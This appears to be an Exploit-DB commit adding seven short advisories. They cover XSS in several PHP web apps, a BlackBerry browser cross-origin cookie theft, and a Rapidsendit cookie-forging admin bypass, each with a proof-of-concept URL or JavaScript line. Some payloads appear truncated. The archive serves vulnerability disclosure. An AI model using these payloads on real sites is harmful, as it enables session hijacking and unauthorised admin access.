From 66d3c41613cae58b9d4c1674d1a604ab9091966b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Sep 2014 04:44:44 +0000 Subject: [PATCH] Updated 09_30_2014 --- files.csv | 7 +++++++ platforms/hardware/remote/34802.html | 29 ++++++++++++++++++++++++++++ platforms/php/webapps/34803.txt | 9 +++++++++ platforms/php/webapps/34804.txt | 10 ++++++++++ platforms/php/webapps/34805.txt | 8 ++++++++ platforms/php/webapps/34806.txt | 9 +++++++++ platforms/php/webapps/34807.txt | 9 +++++++++ platforms/php/webapps/34808.txt | 10 ++++++++++ 8 files changed, 91 insertions(+) create mode 100755 platforms/hardware/remote/34802.html create mode 100755 platforms/php/webapps/34803.txt create mode 100755 platforms/php/webapps/34804.txt create mode 100755 platforms/php/webapps/34805.txt create mode 100755 platforms/php/webapps/34806.txt create mode 100755 platforms/php/webapps/34807.txt create mode 100755 platforms/php/webapps/34808.txt diff --git a/files.csv b/files.csv index 5b04ec274..4df92cca8 100755 --- a/files.csv +++ b/files.csv @@ -31331,3 +31331,10 @@ id,file,description,date,author,platform,type,port 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability˛",2010-10-04,"Eugene Salov",php,webapps,0 +34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0 +34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 'ogp_show.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 +34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 +34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 +34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 +34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 'vote.php' Cross Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0 +34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0 diff --git a/platforms/hardware/remote/34802.html b/platforms/hardware/remote/34802.html new file mode 100755 index 000000000..05a0a29bd --- /dev/null +++ b/platforms/hardware/remote/34802.html @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/43685/info + +Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy. + +An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. + +# [+] BlackBerry Browser Cross Origin Bypass +# +# [+] Author : 599eme Man +# [+] Contact : Flouf@live.fr +# +#[------------------------------------------------------------------------------------] +# +# [+] How use ? +# +# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website. +# +# [+] PoC : +# +# Create a file.htm, save it with this code below and upload it on your server. +# +# +# Test me
+# diff --git a/platforms/php/webapps/34803.txt b/platforms/php/webapps/34803.txt new file mode 100755 index 000000000..77aada3de --- /dev/null +++ b/platforms/php/webapps/34803.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43689/info + +Online Guestbook Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Online Guestbook Pro 5.1 is vulnerable; other versions may also be affected. + +http://www.example.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice== \ No newline at end of file diff --git a/platforms/php/webapps/34804.txt b/platforms/php/webapps/34804.txt new file mode 100755 index 000000000..a8c8062a5 --- /dev/null +++ b/platforms/php/webapps/34804.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/43692/info + +Rentventory is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +Rentventory 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?Login= +http://www.example.com/index.php?Password= diff --git a/platforms/php/webapps/34805.txt b/platforms/php/webapps/34805.txt new file mode 100755 index 000000000..32b97fb95 --- /dev/null +++ b/platforms/php/webapps/34805.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/43693/info + +StatsCode is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Login : '> +Password : '> diff --git a/platforms/php/webapps/34806.txt b/platforms/php/webapps/34806.txt new file mode 100755 index 000000000..533e34b6a --- /dev/null +++ b/platforms/php/webapps/34806.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43697/info + +JNM Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +JNM Guestbook 3.0 is vulnerable; other versions may also be affected. + + http://www.example.com/scripts/guestbook/test2/?page=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc \ No newline at end of file diff --git a/platforms/php/webapps/34807.txt b/platforms/php/webapps/34807.txt new file mode 100755 index 000000000..29d0aec59 --- /dev/null +++ b/platforms/php/webapps/34807.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43699/info + +JNM Solutions DB Top Sites is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +JNM Solutions DB Top Sites 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/topsites/vote.php?u=RGVtb24=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(314888759311)%3B%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/34808.txt b/platforms/php/webapps/34808.txt new file mode 100755 index 000000000..756138d8c --- /dev/null +++ b/platforms/php/webapps/34808.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/43702/info + +Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication. + +Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks. + +Rapidsendit Clone Script 2.1 and prior are vulnerable. + +javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/"; +696d29e0940a4957748fe3fc9efd22a3 = password \ No newline at end of file